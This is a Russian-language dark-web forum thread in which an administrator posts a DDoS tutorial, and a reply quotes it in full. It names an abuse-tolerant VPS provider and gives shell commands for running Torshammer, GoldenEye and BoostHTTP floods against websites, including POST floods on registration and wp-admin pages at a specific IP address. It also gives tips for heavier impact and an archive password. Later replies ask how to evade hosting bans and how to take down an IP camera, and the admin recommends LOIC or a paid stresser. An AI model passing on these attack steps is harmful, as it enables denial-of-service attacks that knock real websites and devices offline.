Актуально Обучение DDoS атакам

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

AnGel

Администратор
Команда форума

AnGel

Администратор
Команда форума
27 Авг 2015
3,411
2,025
И так здравствуйте. Сегодня я раскрою миф о Layer7 ддос атаках, http протокола. Есть атаки с ботнетов а есть с серверов со спуфом.
Что такое спуф? Это когда 1 сервер отсылает запросы с направлением на удаленный веб-сервер (не факт что веб) через определенное количество прокси серверов, которые отсылают уже забрасывают пакеты на конечную точку (сервер который вы атакуете) полуоткрытыми соединения "tcp-syn атаки".
На самом деле что бы положить сайт никакой мощности и не требуется, просто знания выявления уязвимостей и правильность использования протоколов и приложения веб-сервера (Apache2, NGINX).
Для того что бы атаковать без-палевно, возьмите за 350 рублей сервер VPS с хорошей сетью. Советую брать тут, ибо им глубоко наплевать чем вы занимаетесь на сервере.
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Нет нет - это не пиар хостинга, они всем ддосерам известны как торговцы и реселлеры серверов. Для начала VPS за 5$ вам в полне должно хватить, можете воспользоваться VPS серверами с тестовым периодом, но я советую брать сразу такой.

Далее укажите в запросе что бы вам поставили ОС Debian или Ubuntu. После получения доступов к серверу - скачиваем PUTTY (программа для удаленного управления Linux серверов)

Вписываете ИП, логин - root и пароль который вам выслали на почту.

Перед вами черный терминал: и так приступим!

Вписываем команды:
Код:
apt-get update
apt-get install python python3
pip install python-lib
apt-get install perl
apt-get upgrade
Далее скачиваем мой архив со скриптами
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
, в нем 3 скрипта под Layer7 атаки на вебсерверы методами get/post/head/
Рассмотрим первый ( Torshammer )
распаковываем все архивы в папке root и в терминале прописываем
Код:
chmod -R 777 /root
И кстати что бы залить архив и распаковать его - надо воспользоваться программой Filezilla или Winscp - так же вписывайте IP+ root + пароль.

Далее команды:
Код:
apt-get install unzip
unzip ddos_tools.zip
После того как мы выдали права на root папку, заходим в папку torshammer :
Код:
cd /root/torshammer
Запускаем атаку на сайт который хотите атаковать :
Код:
./torshammer.py www.example.com -r 400
Этот скрипт вызывает полуоткрытые tcp соединения с 1 и тогоже ип адреса вашего сервера, соединение несет низкий ttl так что эту атаку многие легко смогут заблокировать если додумаются.

Вторая атака (GET/POST методы)
Код:
cd /GoldenEye
./goldeneye.py http://www.example.com/ -w 50 -s 5000 -m get -d
Так же можем атаковать POST методом например по PHP скриптам сайта ( регистрации аккаунтов) или по WordPress
Код:
./goldeneye.py http://91.134.200.189/register.php/ -w 50 -s 600 -m post
./goldeneye.py http://91.134.200.189/wp-admin/ -w 50 -s 600 -m post
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
и
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
- это пример сайтов которые мы атакуем как и по домену так и по IP адресу.

А теперь самая сильная атака из всех что я знаю для атаки сайтов под спуфы BoostHTTP

Она используется на 99% стрессорах и вызывает разрушительные ошибки приложения веб-серверов IIS, Apache2 и даже NGINX! Спуф атака про которую я говорил, равносильна атаке с ботнета в зависимости от количества ИП адесов в списке файла proxy.txt

Код:
cd /boosthttp
python BoosTHTTPv3.0.py
И следуйте примеру - укажите адрес и порт.
Так же я добавил свежие прокси листы для спуфа. Можете закупаться прокси листами, результатом вы останетесь довольнына все 100%.

Эти методы на 100% рабочие, все зависит от ваших рук и сайтов,также эти скрипты с открытым кодом и вы можете менять методы атак и структуры отправки пакетов на атакуемый сервер.
Еще хотел подметить что если запускать атаку по файлам большего размера чем главная страница сайта index, например на сайте есть тяжелое видео или картинка или архив,то атака будет в 2-10 раз производительнее. Ведь 95% хостеров даже не знают как защищать сеть от http флуда.

Удачи всем кто хочет изучать сеть , для тех кто хочет защищать веб серверы, я создам отдельную тему если вам понравилось.

Вечная ссылка во вложениях.
Пароль на архив: Dark-Time.Com

 

Вложения

leonukv

Участник

leonukv

Участник
26 Фев 2017
49
8
И так здравствуйте. Сегодня я раскрою миф о Layer7 ддос атаках, http протокола. Есть атаки с ботнетов а есть с серверов со спуфом.
Что такое спуф? Это когда 1 сервер отсылает запросы с направлением на удаленный веб-сервер (не факт что веб) через определенное количество прокси серверов, которые отсылают уже забрасывают пакеты на конечную точку (сервер который вы атакуете) полуоткрытыми соединения "tcp-syn атаки".
На самом деле что бы положить сайт никакой мощности и не требуется, просто знания выявления уязвимостей и правильность использования протоколов и приложения веб-сервера (Apache2, NGINX).
Для того что бы атаковать без-палевно, возьмите за 350 рублей сервер VPS с хорошей сетью. Советую брать тут, ибо им глубоко наплевать чем вы занимаетесь на сервере.
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Нет нет - это не пиар хостинга, они всем ддосерам известны как торговцы и реселлеры серверов. Для начала VPS за 5$ вам в полне должно хватить, можете воспользоваться VPS серверами с тестовым периодом, но я советую брать сразу такой.

Далее укажите в запросе что бы вам поставили ОС Debian или Ubuntu. После получения доступов к серверу - скачиваем PUTTY (программа для удаленного управления Linux серверов)

Вписываете ИП, логин - root и пароль который вам выслали на почту.

Перед вами черный терминал: и так приступим!

Вписываем команды:
Код:
apt-get update
apt-get install python python3
pip install python-lib
apt-get install perl
apt-get upgrade
Далее скачиваем мой архив со скриптами
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
, в нем 3 скрипта под Layer7 атаки на вебсерверы методами get/post/head/
Рассмотрим первый ( Torshammer )
распаковываем все архивы в папке root и в терминале прописываем
Код:
chmod -R 777 /root
И кстати что бы залить архив и распаковать его - надо воспользоваться программой Filezilla или Winscp - так же вписывайте IP+ root + пароль.

Далее команды:
Код:
apt-get install unzip
unzip ddos_tools.zip
После того как мы выдали права на root папку, заходим в папку torshammer :
Код:
cd /root/torshammer
Запускаем атаку на сайт который хотите атаковать :
Код:
./torshammer.py www.example.com -r 400
Этот скрипт вызывает полуоткрытые tcp соединения с 1 и тогоже ип адреса вашего сервера, соединение несет низкий ttl так что эту атаку многие легко смогут заблокировать если додумаются.

Вторая атака (GET/POST методы)
Код:
cd /GoldenEye
./goldeneye.py http://www.example.com/ -w 50 -s 5000 -m get -d
Так же можем атаковать POST методом например по PHP скриптам сайта ( регистрации аккаунтов) или по WordPress
Код:
./goldeneye.py http://91.134.200.189/register.php/ -w 50 -s 600 -m post
./goldeneye.py http://91.134.200.189/wp-admin/ -w 50 -s 600 -m post
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
и
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
- это пример сайтов которые мы атакуем как и по домену так и по IP адресу.

А теперь самая сильная атака из всех что я знаю для атаки сайтов под спуфы BoostHTTP

Она используется на 99% стрессорах и вызывает разрушительные ошибки приложения веб-серверов IIS, Apache2 и даже NGINX! Спуф атака про которую я говорил, равносильна атаке с ботнета в зависимости от количества ИП адесов в списке файла proxy.txt

Код:
cd /boosthttp
python BoosTHTTPv3.0.py
И следуйте примеру - укажите адрес и порт.
Так же я добавил свежие прокси листы для спуфа. Можете закупаться прокси листами, результатом вы останетесь довольнына все 100%.

Эти методы на 100% рабочие, все зависит от ваших рук и сайтов,также эти скрипты с открытым кодом и вы можете менять методы атак и структуры отправки пакетов на атакуемый сервер.
Еще хотел подметить что если запускать атаку по файлам большего размера чем главная страница сайта index, например на сайте есть тяжелое видео или картинка или архив,то атака будет в 2-10 раз производительнее. Ведь 95% хостеров даже не знают как защищать сеть от http флуда.

Удачи всем кто хочет изучать сеть , для тех кто хочет защищать веб серверы, я создам отдельную тему если вам понравилось.

Вечная ссылка во вложениях.
Пароль на архив: Dark-Time.Com
Спасибо за годноту , ты реально ангел.
 

Pitt64

Участник

Pitt64

Участник
17 Ноя 2015
22
4
Весьма полезно. Черт, как ставить симпатии? Что-то не найду никак:с
 

bubuka55

Участник

bubuka55

Участник
23 Ноя 2017
10
0
А вот эти скрипты так же использовать?
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

P.S
vds который ты посоветовал там максимум канал 1gbps это мало.. выдел есть 10 gbps вот это уже куда не шло парочку таких снял и всё..
 

bubuka55

Участник

bubuka55

Участник
23 Ноя 2017
10
0
Фигня,попробывал снять на
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
vps сервер, не много подосил сервак кс и на почту пришло вот такое письмо.

"Здравствуйте, мы получили жалобу на ваш сервер. Пожалуйста, решите проблему в течении 24 часов и сообщите нам ответом на это письма о принятых мерах, чтобы избежать блокировки сервера."

Вот так вот этот хостинг не годится для таких дел.
 

bubuka55

Участник

bubuka55

Участник
23 Ноя 2017
10
0
Что взять? я купил хост только использовал другие скрипты... udp script на perl вот только там ни как прокси не заюзать на vps с этим скриптом...
 

Likey

Участник

Likey

Участник
28 Авг 2017
26
4
И прежде чем писать тут чушь скрины посмотри что vps был куплен и получен бан за ддос,кулцхакер бл*
То есть одноклеточным абузоустойчивый хост не предлагать ? Для теста тебе жалко потратить 4 бакса ? Ор.
 

bubuka55

Участник

bubuka55

Участник
23 Ноя 2017
10
0
То есть одноклеточным абузоустойчивый хост не предлагать ? Для теста тебе жалко потратить 4 бакса ? Ор.
Омг,ты вообще о чём? я еще раз говорю купил vps на inferno за 5$! и получил бан за исходящий траффик!они сами написали что мой сервер якобы мешает другим соседним серверам что я отжираю у них весь исходящий траффик и дали бан! какая тут абуза?
Если знаеш где разрешён флуд на vps просвети неуча :) Inferno.PNG
 

bubuka55

Участник

bubuka55

Участник
23 Ноя 2017
10
0
гугл я знаю:),но здесь речь в теме шла что админам инферно на всё плевать твори что душе угодно =)

P.S

Где достать сорцы для скана DNS серверов не знаеш?
 
Последнее редактирование:

Богдан188

Участник

Богдан188

Участник
29 Окт 2017
1
0
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Спасибо
 

PAB

Участник

PAB

Участник
29 Май 2018
2
0
Скажите чем можно положить IP камеру...?
 

AnGel

Администратор
Команда форума

AnGel

Администратор
Команда форума
27 Авг 2015
3,411
2,025
PAB, loic если ваш канал превышает канал камеры и нет фильтрации трафика. 100% вариант - стрессер платный.
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя